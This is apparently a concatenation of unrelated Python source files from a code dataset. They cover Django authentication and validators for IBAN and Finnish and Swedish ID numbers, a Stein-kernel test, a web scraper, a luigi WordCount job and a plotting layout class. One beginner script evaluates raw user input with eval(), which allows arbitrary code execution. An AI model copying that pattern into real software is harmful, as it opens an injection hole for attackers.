"user": UserSerializer(user, context=self.get_serializer_context()).data,
"token": AuthToken.objects.create(user) [1]
})
# Get user API
class UserAPI(generics.RetrieveAPIView):
permission_classes=[
permissions.IsAuthenticated,
]
serializer_class= UserSerializer
def get_object(self):
return self.request.user
| StarcoderdataPython |
1753375 | <gh_stars>1-10
x=input("ENTER 1st NUMBER")
y=input("ENTER 2nd NUMBER")
x=int(x)
y=int(y)
z=x+y
print(z)
# another way
result = eval(input('enter en expr')) # enter expression ---> 2 + 6 - 1
print(result)
| StarcoderdataPython |
1742890 | import re
import unicodedata
from datetime import date
from decimal import Decimal
from django.core.exceptions import ValidationError
from django.utils.timezone import now
from django.utils.translation import ugettext as _
EMAIL_VALIDATOR = re.compile(r'[a-zA-Z0-9\._-]+@[a-zA-Z0-9\._-]+\.[a-zA-Z]+')
PHONE_FILTER = re.compile(r'[^+0-9]')
PHONE_VALIDATOR = re.compile(r'\+?\d{6,}')
PASSPORT_FILTER = re.compile(r'[^-A-Z0-9]')
STRIP_NON_NUMBERS = re.compile(r'[^0-9]')
STRIP_NON_ALPHANUMERIC = re.compile(r'[^0-9A-Za-z]')
STRIP_WHITESPACE = re.compile(r'\s+')
IBAN_FILTER = re.compile(r'[^A-Z0-9]')
def phone_filter(v: str) -> str:
return PHONE_FILTER.sub('', str(v)) if v else ''
def email_filter(v: str) -> str:
return str(v).lower().strip() if v else ''
def email_validator(v: str) -> str:
v = email_filter(v)
if not v or not EMAIL_VALIDATOR.fullmatch(v):
v_str = _('Missing value') if not v else str(v)
raise ValidationError(_('Invalid email') + ': {}'.format(v_str), code='invalid_email')
def phone_validator(v: str):
v = phone_filter(v)
if not v or not PHONE_VALIDATOR.fullmatch(v):
v_str = _('Missing value') if v is None else str(v)
raise ValidationError(_('Invalid phone number') + ': {}'.format(v_str), code='invalid_phone')
def passport_filter(v: str) -> str:
return PASSPORT_FILTER.sub('', str(v).upper()) if v else ''
def passport_validator(v: str):
v = passport_filter(v)
if not v or len(v) < 5:
v_str = _('Missing value') if v is None else str(v)
raise ValidationError(_('Invalid passport number') + ': {}'.format(v_str), code='invalid_passport')
def ascii_filter(v: str) -> str:
"""
Replaces Unicode accent characters with plain ASCII.
For example remove_accents('HELÉN') == 'HELEN'.
:param v: str
:return: str
"""
return unicodedata.normalize('NFKD', v).encode('ASCII', 'ignore').decode()
def iban_filter(v: str) -> str:
return IBAN_FILTER.sub('', str(v).upper()) if v else ''
def iban_filter_readable(acct) -> str:
acct = iban_filter(acct)
if acct:
i = 0
j = 4
out = ''
nlen = len(acct)
while i < nlen:
if out:
out += ' '
out += acct[i:j]
i = j
j += 4
return out
return acct
def iban_validator(v: str):
v = iban_filter(v)
if not v:
raise ValidationError(_('Invalid IBAN account number') + ': {}'.format(_('Missing value')), code='invalid_iban')
digits = '0123456789'
num = ''
for ch in v[4:] + v[0:4]:
if ch not in digits:
ch = str(ord(ch) - ord('A') + 10)
num += ch
x = Decimal(num) % Decimal(97)
if x != Decimal(1):
raise ValidationError(_('Invalid IBAN account number') + ': {}'.format(v), code='invalid_iban')
def validate_country_iban(v: str, country: str, length: int):
v = iban_filter(v)
if len(v) != length:
raise ValidationError(_('Invalid IBAN account number') + ' ({}.1): {}'.format(country, v), code='invalid_iban')
if v[0:2] != country:
raise ValidationError(_('Invalid IBAN account number') + ' ({}.2): {}'.format(country, v), code='invalid_iban')
digits = '0123456789'
num = ''
for ch in v[4:] + v[0:4]:
if ch not in digits:
ch = str(ord(ch) - ord('A') + 10)
num += ch
x = Decimal(num) % Decimal(97)
if x != Decimal(1):
raise ValidationError(_('Invalid IBAN account number') + ' ({}.3): {}'.format(country, v), code='invalid_iban')
def iban_bank_info(v: str) -> (str, str):
"""
Returns BIC code and bank name from IBAN number.
:param v: IBAN account number
:return: (BIC code, bank name) or ('', '') if not found / unsupported country
"""
v = iban_filter(v)
if v[:2] == 'FI':
return fi_iban_bank_info(v)
elif v[:2] == 'BE':
return be_iban_bank_info(v)
else:
return '', ''
def iban_bic(v: str) -> str:
"""
Returns BIC code from IBAN number.
:param v: IBAN account number
:return: BIC code or '' if not found
"""
info = iban_bank_info(v)
return info[0] if info else ''
def calculate_age(born: date, today: date or None=None) -> int:
if not today:
today = now().date()
return today.year - born.year - ((today.month, today.day) < (born.month, born.day))
# -----------------------------------------------
# Finland
# -----------------------------------------------
FI_SSN_FILTER = re.compile(r'[^-A-Z0-9]')
FI_SSN_VALIDATOR = re.compile(r'^\d{6}[+-A]\d{3}[\d\w]$')
FI_COMPANY_REG_ID_FILTER = re.compile(r'[^0-9]')
def fi_payment_reference_number(num: str):
"""
Appends Finland reference number checksum to existing number.
:param num: At least 3 digits
:return: Number plus checksum
"""
assert isinstance(num, str)
num = STRIP_WHITESPACE.sub('', num)
num = re.sub(r'^0+', '', num)
assert len(num) >= 3
weights = [7, 3, 1]
weighed_sum = 0
numlen = len(num)
for j in range(numlen):
weighed_sum += int(num[numlen - 1 - j]) * weights[j % 3]
return num + str((10 - (weighed_sum % 10)) % 10)
def fi_payment_reference_validator(v: str):
    """
    Validates a Finnish national payment reference number by recomputing
    its trailing (7-3-1 weighted) checksum digit.
    :param v: reference number; whitespace is ignored
    :raises ValidationError: if the checksum digit does not match
    """
    v = STRIP_WHITESPACE.sub('', v)
    # rebuild the reference from all but the last digit and compare
    if fi_payment_reference_number(v[:-1]) != v:
        raise ValidationError(_('Invalid payment reference: {}').format(v))
def iso_payment_reference_validator(v: str):
    """
    Validates ISO reference number checksum.
    :param v: Reference number
    """
    v = STRIP_WHITESPACE.sub('', v)
    # move the first four characters to the end, then expand letters to
    # two-digit numbers (A=10 ... Z=35) before the mod-97 test
    digits = ''
    for ch in v[4:] + v[0:4]:
        code = ord(ch)
        if ord('0') <= code <= ord('9'):
            digits += ch
        else:
            code -= 55
            if code < 10 or code > 35:
                raise ValidationError(_('Invalid payment reference: {}').format(v))
            digits += str(code)
    if Decimal(digits) % Decimal('97') != Decimal('1'):
        raise ValidationError(_('Invalid payment reference: {}').format(v))
def fi_iban_validator(v: str):
    """Validates a Finnish IBAN (country code 'FI', 18 characters)."""
    validate_country_iban(v, 'FI', 18)
def fi_iban_bank_info(v: str) -> (str, str):
    """
    Returns BIC code and bank name from FI IBAN number.
    :param v: IBAN account number
    :return: (BIC code, bank name) or ('', '') if not found
    """
    from jutil.bank_const_fi import FI_BIC_BY_ACCOUNT_NUMBER, FI_BANK_NAME_BY_BIC
    v = iban_filter(v)
    # the three digits after the country code + check digits select the bank
    bic = FI_BIC_BY_ACCOUNT_NUMBER.get(v[4:7])
    if bic is None:
        return '', ''
    return bic, FI_BANK_NAME_BY_BIC[bic]
def be_iban_bank_info(v: str) -> (str, str):
    """
    Returns BIC code and bank name from BE IBAN number.
    :param v: IBAN account number
    :return: (BIC code, bank name) or ('', '') if not found
    """
    from jutil.bank_const_be import BE_BIC_BY_ACCOUNT_NUMBER, BE_BANK_NAME_BY_BIC
    v = iban_filter(v)
    # the three digits after the country code + check digits select the bank
    bic = BE_BIC_BY_ACCOUNT_NUMBER.get(v[4:7])
    if bic is None:
        return '', ''
    return bic, BE_BANK_NAME_BY_BIC.get(bic, '')
def fi_ssn_filter(v: str) -> str:
    """Uppercases *v* and strips every character FI_SSN_FILTER rejects."""
    return FI_SSN_FILTER.sub('', v.upper())
def fi_company_reg_id_filter(v: str) -> str:
    """
    Normalizes a Finnish company registration id into 'NNNNNNN-C' form:
    keeps only the digits and re-inserts the dash before the check digit.
    Returns '' when fewer than two digits remain.
    """
    digits = FI_COMPANY_REG_ID_FILTER.sub('', v)
    if len(digits) < 2:
        return ''
    return digits[:-1] + '-' + digits[-1:]
def fi_company_reg_id_validator(v0: str) -> None:
    """
    Validates a Finnish company registration id (y-tunnus), e.g. '1234567-8'.
    The last digit is a check digit computed from the first seven digits with
    weights (7, 9, 10, 5, 8, 4, 2) modulo 11.
    :param v0: candidate company registration id (formatting is ignored)
    :raises ValidationError: with code 'invalid_company_reg_id' if the format
        or the check digit is wrong (error markers FI.1-FI.4)
    """
    v = fi_company_reg_id_filter(v0)
    prefix = v[:2]
    # NOTE(review): after fi_company_reg_id_filter() the value contains only
    # digits plus a '-' before the last digit, so the 'FI' branch looks
    # unreachable -- confirm whether unfiltered input was intended here.
    if v[-2:-1] != '-' and prefix != 'FI':
        raise ValidationError(_('Invalid company registration ID')+' (FI.1): {}'.format(v0), code='invalid_company_reg_id')
    v = v.replace('-', '', 1)
    if len(v) != 8:
        raise ValidationError(_('Invalid company registration ID')+' (FI.2): {}'.format(v0), code='invalid_company_reg_id')
    # weighted sum of the first seven digits
    multipliers = (7, 9, 10, 5, 8, 4, 2)
    x = 0
    for i, m in enumerate(multipliers):
        x += int(v[i]) * m
    quotient, remainder = divmod(x, 11)
    # a remainder of 1 can never produce a valid check digit
    if remainder == 1:
        raise ValidationError(_('Invalid company registration ID')+' (FI.3): {}'.format(v0), code='invalid_company_reg_id')
    if remainder >= 2:
        check_digit = str(11 - remainder)
        if check_digit != v[-1:]:
            raise ValidationError(_('Invalid company registration ID')+' (FI.4): {}'.format(v0), code='invalid_company_reg_id')
    # NOTE(review): remainder == 0 (check digit should be '0') is accepted
    # without verifying the last digit -- confirm this leniency is intended.
def fi_ssn_validator(v: str):
    """
    Validates a Finnish personal identification number (henkilotunnus).
    :param v: candidate SSN (filtered and uppercased first)
    :raises ValidationError: code 'invalid_ssn' on malformed input (FI.1)
        or a wrong check character (FI.2)
    """
    v = fi_ssn_filter(v)
    if not FI_SSN_VALIDATOR.fullmatch(v):
        raise ValidationError(_('Invalid personal identification number')+' (FI.1): {}'.format(v), code='invalid_ssn')
    # check character: (ddmmyy + individual number) mod 31, mapped to 0-9/A-Y
    remainder = int(Decimal(v[0:6] + v[7:10]) % Decimal(31))
    check_chars = {
        10: 'A', 11: 'B', 12: 'C', 13: 'D', 14: 'E', 15: 'F', 16: 'H',
        17: 'J', 18: 'K', 19: 'L', 20: 'M', 21: 'N', 22: 'P', 23: 'R',
        24: 'S', 25: 'T', 26: 'U', 27: 'V', 28: 'W', 29: 'X', 30: 'Y',
    }
    expected = check_chars.get(remainder, str(remainder))
    if expected != v[-1:]:
        raise ValidationError(_('Invalid personal identification number')+' (FI.2): {}'.format(v), code='invalid_ssn')
def fi_ssn_birthday(v: str) -> date:
    """
    Extracts the date of birth from a Finnish SSN such as '231298-965X':
    day/month/two-digit-year plus a century separator ('+' -> 1800s,
    '-' -> 1900s, 'A' -> 2000s). The SSN is validated first.
    """
    v = fi_ssn_filter(v)
    fi_ssn_validator(v)
    century_by_sep = {'+': 1800, '-': 1900, 'A': 2000}
    year = int(v[4:6]) + century_by_sep.get(v[6], 0)
    month = int(v[2:4])
    day = int(v[0:2])
    return date(year, month, day)
def fi_ssn_age(ssn: str, today: date or None=None) -> int:
    """Returns the age in full years of the person with Finnish SSN *ssn* as of *today* (default: current date)."""
    return calculate_age(fi_ssn_birthday(ssn), today)
# -----------------------------------------------
# Sweden
# -----------------------------------------------
# Keep only digits and '-' when normalizing a Swedish SSN candidate.
SE_SSN_FILTER = re.compile(r'[^-0-9]')
# Swedish personnummer, short form: YYMMDD-NNNC (dash separator required).
SE_SSN_VALIDATOR = re.compile(r'^\d{6}[-]\d{3}[\d]$')
def se_iban_validator(v: str):
    """Validates a Swedish IBAN (country code 'SE', 24 characters)."""
    validate_country_iban(v, 'SE', 24)
def se_ssn_filter(v: str) -> str:
    """Uppercases *v* and strips every character other than digits and '-'."""
    return SE_SSN_FILTER.sub('', v.upper())
def se_ssn_validator(v: str):
    """
    Validates a Swedish personal identification number (personnummer) in
    its short YYMMDD-NNNC form using the Luhn checksum over the first
    nine digits.
    :param v: candidate SSN (filtered and uppercased first)
    :raises ValidationError: code 'invalid_ssn' on malformed input (SE.1)
        or a wrong check digit (SE.2)
    """
    v = se_ssn_filter(v)
    if not SE_SSN_VALIDATOR.fullmatch(v):
        raise ValidationError(_('Invalid personal identification number')+' (SE.1): {}'.format(v), code='invalid_ssn')
    v = STRIP_NON_NUMBERS.sub('', v)
    # Luhn: double every digit at an even index, then sum the digits of
    # each (possibly doubled) value
    total = 0
    for i in range(9):
        x = int(v[i])
        if i % 2 == 0:
            x *= 2
        total += x % 10 + (x // 10) % 10
    checksum = (10 - total % 10) % 10
    if int(v[-1:]) != checksum:
        raise ValidationError(_('Invalid personal identification number')+' (SE.2): {}'.format(v), code='invalid_ssn')
def se_clearing_code_bank_info(account_number: str) -> (str, int):
    """
    Returns Sweden bank info by clearing code.
    :param account_number: 4-digit clearing code or account number
    :return: (Bank name, account digit count) or ('', None) if not found
    """
    from jutil.bank_const_se import SE_BANK_CLEARING_LIST
    clearing = account_number[:4]
    # each entry holds an inclusive clearing-code range for one bank
    for bank_name, range_begin, range_end, acc_digits in SE_BANK_CLEARING_LIST:
        if range_begin <= clearing <= range_end:
            return bank_name, acc_digits
    return '', None
| StarcoderdataPython |
95254 | import numpy as np
import pandas as pd
import datetime as dt
import math
import seaborn as sns
import matplotlib.pyplot as plt
import glob | StarcoderdataPython |
79907 | from collections import namedtuple
import jax.numpy as jnp
import pytest
from numpy.testing import assert_allclose
from numpyro.infer.einstein.kernels import (
RBFKernel,
RandomFeatureKernel,
GraphicalKernel,
IMQKernel,
LinearKernel,
MixtureKernel,
HessianPrecondMatrix,
PrecondMatrixKernel
)
# Test-case record: kernel constructor, particle_info builder, loss function,
# and the expected kernel value(s) keyed by kernel mode.
T = namedtuple('TestSteinKernel', ['kernel', 'particle_info', 'loss_fn', 'kval'])
# Four 2-d particles used as the kernel's reference set.
PARTICLES_2D = jnp.array([[1., 2.], [-10., 10.], [0., 0.], [2., -1]])
TPARTICLES_2D = (jnp.array([1., 2.]), jnp.array([10., 5.]))  # transformed particles
# Expected values were precomputed for the particles above; only the modes
# present in each ``kval`` dict are exercised by the test.
TEST_CASES = [
    T(RBFKernel,
      lambda d: {},
      lambda x: x,
      {'norm': 3.8147664e-06,
       'vector': jnp.array([0., 0.2500005]),
       'matrix': jnp.array([[3.8147664e-06, 0.],
                            [0., 3.8147664e-06]])}
      ),
    T(RandomFeatureKernel,
      lambda d: {},
      lambda x: x,
      {'norm': -4.566867}),
    T(IMQKernel,
      lambda d: {},
      lambda x: x,
      {'norm': .104828484,
       'vector': jnp.array([0.11043153, 0.31622776])}
      ),
    T(LinearKernel,
      lambda d: {},
      lambda x: x,
      {'norm': 21.}
      ),
    T(lambda mode: MixtureKernel(mode=mode, ws=jnp.array([.2, .8]), kernel_fns=[RBFKernel(mode), RBFKernel(mode)]),
      lambda d: {},
      lambda x: x,
      {'matrix': jnp.array([[3.8147664e-06, 0.],
                            [0., 3.8147664e-06]])}
      ),
    T(lambda mode: GraphicalKernel(mode=mode, local_kernel_fns={'p1': RBFKernel('norm')}),
      lambda d: {'p1': (0, d)},
      lambda x: x,
      {'matrix': jnp.array([[3.8147664e-06, 0.],
                            [0., 3.8147664e-06]])}
      ),
    T(lambda mode: PrecondMatrixKernel(HessianPrecondMatrix(), RBFKernel(mode='matrix')),
      lambda d: {},
      lambda x: x[0] ** 4 - x[1] ** 3 / 2,
      {'matrix': jnp.array([[5.608312e-09, 0.],
                            [0., 9.347186e-05]])}
      )
]
PARTICLES = [(PARTICLES_2D, TPARTICLES_2D)]
# NOTE(review): for class entries ``t[0].__class__.__name__`` yields the
# metaclass name and for lambdas it yields 'function', so these pytest ids
# may not be distinct/descriptive -- confirm intent.
TEST_IDS = [t[0].__class__.__name__ for t in TEST_CASES]
@pytest.mark.parametrize('kernel, particle_info, loss_fn, kval', TEST_CASES, ids=TEST_IDS)
@pytest.mark.parametrize('particles, tparticles', PARTICLES)
@pytest.mark.parametrize('mode', ['norm', 'vector', 'matrix'])
def test_kernel_forward(kernel, particles, particle_info, loss_fn, tparticles, mode, kval):
    """Check each Stein kernel's forward value against precomputed expectations."""
    # skip modes the kernel under test has no expected value for
    if mode not in kval:
        return
    # dimensionality of a single (transformed) particle
    d, = tparticles[0].shape
    kernel_fn = kernel(mode=mode).compute(particles, particle_info(d), loss_fn)
    value = kernel_fn(*tparticles)
    assert_allclose(value, kval[mode])
| StarcoderdataPython |
71397 | <reponame>gopal131072/WormScraper
import bs4 as bs
import urllib.request
import sys
import os.path
# Reads the table of contents to try and generate a sitemap for the serial.
# I would use the actual sitemap but this is easier since the sitemap is in
# reverse chronological order whereas this is in the actual chronological
# order and is formatted better.
source = urllib.request.urlopen('https://parahumans.wordpress.com/table-of-contents/').read()
# Parse the downloaded HTML with the lxml backend.
soup = bs.BeautifulSoup(source,'lxml')
# Opens a text file and writes all required URL's into it.
# If the sitemap already exists, the script simply exits without an error.
if(os.path.isfile("worm-sitemap.txt")):
    print("Sitemap already exists, either from a previous scrape, or a custom sitemap.")
    print("Not generating sitemap.")
    sys.exit(0)
else:
    file = open("worm-sitemap.txt","w")
    print("File opened\n")
# Finds all anchor tags and gets the links they point to.
for url in soup.find_all('a'):
    current = url.get('href')
    # The final chapter's URL. We do not need any URL's after we reach this one.
    lastURL = "parahumans.wordpress.com/2013/11/19/interlude-end/"
    if(current==lastURL):
        file.write(lastURL)
        print("All done! URL file generated\n")
        break
    # The URL's vary a lot with title so I had to get creative on how to get
    # only those we needed. Not the best way but it works.
    Keywords = ['2012','2013','category']
    if any(keys in current for keys in Keywords):
        requiredURL = url.get('href')
        # NOTE(review): this replaces the string with itself -- it looks like
        # a mojibake remnant of an encoding fix (e.g. 'A-half' artifacts in
        # chapter slugs); confirm the intended source/target characters.
        requiredURL = requiredURL.replace("½","½")
        file.write(requiredURL + "\n")
        print("Getting link " + url.get('href') + "\n")
file.close()
| StarcoderdataPython |
75355 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""API class for dense (approximate) kernel mappers.
See ./random_fourier_features.py for a concrete instantiation of this class.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
class InvalidShapeError(Exception):
  """Exception thrown when a tensor's shape deviates from an expected shape."""
@six.add_metaclass(abc.ABCMeta)
class DenseKernelMapper(object):
  """Abstract class for a kernel mapper that maps dense inputs to dense outputs.

  This class is abstract. Users should not create instances of this class.
  """

  @abc.abstractmethod
  def map(self, input_tensor):
    """Main Dense-Tensor-In-Dense-Tensor-Out (DTIDTO) map method.

    Should be implemented by subclasses.

    Args:
      input_tensor: The dense input tensor to be mapped using the (approximate)
        kernel mapper.
    """
    raise NotImplementedError('map is not implemented for {}.'.format(self))

  # NOTE(review): abc.abstractproperty is deprecated in modern Python in
  # favor of @property + @abc.abstractmethod; kept as-is for the file's
  # six/py2-compat style.
  @abc.abstractproperty
  def name(self):
    """Returns the name of the kernel mapper."""
    pass

  @abc.abstractproperty
  def output_dim(self):
    """Returns the output dimension of the mapping."""
    pass
3388218 | import luigi
import luigi.contrib.hadoop
import luigi.contrib.hdfs
class InputFile(luigi.ExternalTask):
    """
    A task wrapping a pre-existing HDFS target; it produces no work itself.
    """
    # Path of the input file on HDFS.
    input_file = luigi.Parameter()

    def output(self):
        """
        Return the target on HDFS at ``input_file``.
        """
        return luigi.contrib.hdfs.HdfsTarget(self.input_file)
class WordCount(luigi.contrib.hadoop.JobTask):
    """
    A task that uses Hadoop streaming to perform WordCount over an HDFS
    input file, writing (word, count) pairs to an HDFS output file.
    """
    input_file = luigi.Parameter()
    output_file = luigi.Parameter()
    # Single reducer so all counts end up in one output file.
    n_reduce_tasks = 1

    def requires(self):
        """
        Depend on the raw input file, wrapped as an external HDFS target.
        """
        return InputFile(self.input_file)

    def output(self):
        """
        The job's result lives on HDFS at ``output_file``.
        """
        return luigi.contrib.hdfs.HdfsTarget(self.output_file)

    def mapper(self, line):
        """
        Emit (word, 1) for every whitespace-separated token of the line.
        """
        for token in line.strip().split():
            yield token, 1

    def reducer(self, key, values):
        """
        Emit the word together with the sum of all its emitted counts.
        """
        yield key, sum(values)
# Entry point: hand control to the luigi scheduler with WordCount as the
# default task class.
if __name__ == '__main__':
    luigi.run(main_task_cls=WordCount)
1653202 | import re
import numpy as np
import warnings
import copy
from .utils import is_pos_int, is_non_neg_int, \
is_proportion, is_positive, is_non_negative, \
inherits
class layout:
    """Arrangement specification (grid design + relative sizes) for patches."""

    def __init__(self,
                 ncol=None,
                 nrow=None,
                 byrow=None,
                 rel_widths=None,
                 rel_heights=None,
                 design=None
                 ):
        """
        layout class to store information about arangement of patches found
        in `cow.patch`.

        Arguments
        ---------
        ncol : integer
            Integer for the number of columns to arrange the the patches in.
            The default is None (which avoids conflicts if a value for
            `design` is provided). If ``ncol`` is None but ``nrow`` is not,
            then ``ncol`` will default to the minimum number of columns to
            make sure that all patches can be visualized.
        nrow : integer
            Integer for the number of rows to arrange the the patches in.
            The default is None (which avoids conflicts if a value for
            ``design`` is provided). If ``nrow`` is None but ``ncol`` is not,
            then ``nrow`` will default to the minimum number of rows to make
            sure that all patches can be visualized.
        byrow : boolean
            If ``ncol`` and/or ``nrow`` is included, then this boolean
            indicates if the patches should be ordered by row (default if
            ``byrow`` is None or when parameter is ``True``) or by column (if
            ``byrow`` was ``False``).
        design : np.array (float based) or str
            Specification of the location of each patch in the arrangement.
            Can either be a float numpy array with integers between 0 and
            the number of patches to arrange, or a text string that captures
            similar ideas to the array approach but uses capital alphabetical
            characters (A-Z) to indicate each figure. More information is in
            Notes.
        rel_widths : list, np vector or tuple
            Numerical vector of relative columns widths. This not required,
            the default would be ``np.ones(ncol)`` or
            ``np.ones(design.shape[0])``. Note that this is a relative sizing
            and the values are only required to be non-negative, non-zero
            values, for example ``[1,2]`` would would make the first column
            twice as wide as the second column.
        rel_heights : list or tuple
            Numerical vector of relative row heights. This not required,
            the default would be ``np.ones(nrow)`` or
            ``np.ones(design.shape[1])``. Note that this is a relative sizing
            and the values are only required to be non-negative, non-zero
            values, for example ``[1,2]`` would would make the first row twice
            as tall as the second row.

        Notes
        -----
        *Design*

        The ``design`` parameter expects specific input.

        1. If the ``design`` is input as a numpy array, we expect it to have
        integers only (0 to # patches-1). It is allowed to have ``np.nan``
        values if certain "squares" of the layout are not covered by others
        (the covering is defined by the value ordering). Note that we won't
        check for overlap and ``np.nan`` is not enforced if another patches'
        relative (min-x,min-y) and (max-x, max-y) define a box over that
        ``np.nan``'s area.

        An example of a design of the numpy array form could look like

        >>> my_np_design = np.array([[1,1,2],
        ...                          [3,3,2],
        ...                          [3,3,np.nan]])

        2. if the ``design`` parameter takes in a string, we expect it to have
        a structure such that each line (pre ``\\\\n``) contains the same number
        of characters, and these characters must come from the first
        (number of patches) capital alphabetical characters or the ``\#`` or
        ``.`` sign to indicate an empty square. Similar arguments w.r.t.
        overlap and the lack of real enforcement for empty squares applies
        (as in 1.).

        An example of a design of the string form could look like

        >>> my_str_design = \"\"\"
        ... AAB
        ... CCB
        ... CC\#
        ... \"\"\"

        or

        >>> my_str_design = \"\"\"
        ... AAB
        ... CCB
        ... CC.
        ... \"\"\"

        See the `Layout guide`_ for more detailed examples of functionality.

        .. _Layout guide: https://benjaminleroy.github.io/cowpatch/guides/Layout.html

        *Similarities to our `R` cousins:*

        This layout function is similar to `patchwork\:\:plot_layout <https://patchwork.data-imaginist.com/reference/plot_layout.html>`_
        (with a special node to ``design`` parameter) and helps perform similar
        ideas to `gridExtra\:\:arrangeGrob <https://cran.r-project.org/web/packages/gridExtra/vignettes/arrangeGrob.html>`_'s
        ``layout_matrix`` parameter, and `cowplot\:\:plot_grid <https://wilkelab.org/cowplot/reference/plot_grid.html>`_'s
        ``rel_widths`` and ``rel_heights`` parameters.

        Examples
        --------
        >>> # Necessary libraries for example
        >>> import numpy as np
        >>> import cowpatch as cow
        >>> import plotnine as p9
        >>> import plotnine.data as p9_data

        >>> g0 = p9.ggplot(p9_data.mpg) +\\
        ...     p9.geom_bar(p9.aes(x="hwy")) +\\
        ...     p9.labs(title = 'Plot 0')
        >>> g1 = p9.ggplot(p9_data.mpg) +\\
        ...     p9.geom_point(p9.aes(x="hwy", y = "displ")) +\\
        ...     p9.labs(title = 'Plot 1')
        >>> g2 = p9.ggplot(p9_data.mpg) +\\
        ...     p9.geom_point(p9.aes(x="hwy", y = "displ", color="class")) +\\
        ...     p9.labs(title = 'Plot 2')
        >>> g3 = p9.ggplot(p9_data.mpg[p9_data.mpg["class"].isin(["compact",
        ...                                                      "suv",
        ...                                                      "pickup"])]) +\\
        ...     p9.geom_histogram(p9.aes(x="hwy"),bins=10) +\\
        ...     p9.facet_wrap("class")

        >>> # design matrix
        >>> vis_obj = cow.patch(g1,g2,g3)
        >>> vis_obj += cow.layout(design = np.array([[0,1],
        ...                                          [2,2]]))
        >>> vis_obj.show()

        >>> # design string
        >>> vis_obj2 = cow.patch(g1,g2,g3)
        >>> vis_obj2 += cow.layout(design = \"\"\"
        ... AB
        ... CC
        ... \"\"\")
        >>> vis_obj2.show()

        >>> # nrow, ncol, byrow
        >>> vis_obj3 = cow.patch(g0,g1,g2,g3)
        >>> vis_obj3 += cow.layout(nrow=2, byrow=False)
        >>> vis_obj3.show()

        >>> # rel_widths/heights
        >>> vis_obj = cow.patch(g1,g2,g3)
        >>> vis_obj += cow.layout(design = np.array([[0,1],
        ...                                          [2,2]]),
        ...                       rel_widths = np.array([1,2]))
        >>> vis_obj.show()

        See also
        --------
        area : object class that helps ``layout`` define where plots will go
        in the arangement
        patch : fundamental object class which is combined with ``layout`` to
        defin the overall arangement of plots
        """
        # an explicit design overrides any ncol/nrow request
        if design is not None:
            if ncol is not None or nrow is not None:
                warnings.warn("ncol and nrow are overridden"+\
                              " by the design parameter")
            if isinstance(design, np.ndarray):
                if len(design.shape) == 1:
                    warnings.warn("design matrix is 1d,"+\
                                  " will be seen as a 1-row design")
                    nrow, ncol = 1, design.shape[0]
                    design = design.reshape((1,-1))
                else:
                    nrow, ncol = design.shape
            if isinstance(design, str):
                # convert design to desirable structure matrix structure
                design = self._design_string_to_mat(design)
                nrow, ncol = design.shape
        # infer ncol/nrow from the relative size vectors when possible
        if ncol is None:
            if rel_widths is not None:
                if isinstance(rel_widths, np.ndarray):
                    ncol = rel_widths.shape[0]
                if isinstance(rel_widths, list) or \
                        isinstance(rel_widths, tuple):
                    ncol = len(rel_widths)
                    rel_widths = np.array(rel_widths)
        if nrow is None:
            if rel_heights is not None:
                if isinstance(rel_heights, np.ndarray):
                    nrow = rel_heights.shape[0]
                if isinstance(rel_heights, list) or \
                        isinstance(rel_heights, tuple):
                    nrow = len(rel_heights)
                    rel_heights= np.array(rel_heights)
        if rel_widths is None and rel_heights is None:
            assert not (ncol is None and nrow is None), \
                "need some parameters to not be none in design initialization"
        # default to equal-sized columns/rows where a count is known
        if rel_widths is None and ncol is not None:
            rel_widths = np.ones(ncol)
        if rel_heights is None and nrow is not None:
            rel_heights = np.ones(nrow)
        if rel_heights is not None:
            rel_heights = np.array(rel_heights)
        if rel_widths is not None:
            rel_widths = np.array(rel_widths)
        # if design is None:
        #     if byrow is None or byrow:
        #         order_str = "C"
        #     else:
        #         order_str = "F"
        #     design = np.arange(ncol*nrow,dtype = int).reshape((nrow, ncol),
        #                                                       order = order_str)
        # byrow is meaningless once an explicit design is given
        if design is not None:
            byrow = None
        # ncol/nrow and rel_widths/rel_heights correct alignment
        if ncol is not None and rel_widths is not None:
            if ncol != rel_widths.shape[0]:
                raise ValueError("ncol (potentially from the design) and "+\
                                 "rel_widths disagree on size of layout")
        if nrow is not None and rel_heights is not None:
            if nrow != rel_heights.shape[0]:
                raise ValueError("nrow (potentially from the design) and "+\
                                 "rel_heights disagree on size of layout")
        self.ncol = ncol
        self.nrow = nrow
        self.__design = design
        self.byrow = byrow
        self.rel_widths = rel_widths
        self.rel_heights = rel_heights
        self.num_grobs = self._assess_mat(design)

    def _design_string_to_mat(self, design):
        """
        Internal function to convert design string into a matrix

        Arguments
        ---------
        design : str
            design in a string format

        Returns
        -------
        design : np.array integer
            design in np.array format
        """
        design_clean = re.sub(" *\t*", "", design) # removing spaces and tabs
        design_clean = re.sub("^\n*", "", design_clean) # remove leading nl
        design_clean = re.sub("\n*$", "", design_clean) # remove following nl
        row_info = re.split("\n", design_clean)
        # every row must contain the same number of characters
        ncol_lengths = np.unique([len(x) for x in row_info])
        if ncol_lengths.shape != (1,):
            raise ValueError("expect all rows in design to have the same "+\
                             "number of entries, use # for an empty space "+\
                             "if using a string format.")
        ncol = int(ncol_lengths)
        # NOTE(review): nrow counts newlines in the *unstripped* string and is
        # not used below -- confirm it can be removed.
        nrow = len(re.findall("\n", design)) + 1
        # 'A' -> 0, 'B' -> 1, ...; '#' and '.' mark empty squares (np.nan)
        design = np.array([[ord(val)-65
                            if not np.any([val == x for x in ["#","."]])
                            else np.nan
                            for val in r]
                           for r in row_info])
        return design

    def _get_design(self, num_grobs=None):
        """
        create a design matrix if not explicit design has been provided
        """
        if self.__design is not None:
            return self.__design
        if num_grobs is None:
            if self.num_grobs is None:
                raise ValueError("unclear number of grobs in layout...")
            else:
                num_grobs = self.num_grobs
        # fill order: "C" = row-major (byrow default), "F" = column-major
        if self.byrow is None or self.byrow:
            order_str = "C"
        else:
            order_str = "F"
        # if only ncol or nrow is defined...
        ncol = self.ncol
        nrow = self.nrow
        if ncol is None:
            ncol = int(np.ceil(num_grobs / nrow))
        if nrow is None:
            nrow = int(np.ceil(num_grobs / ncol))
        inner_design = np.arange(ncol*nrow,
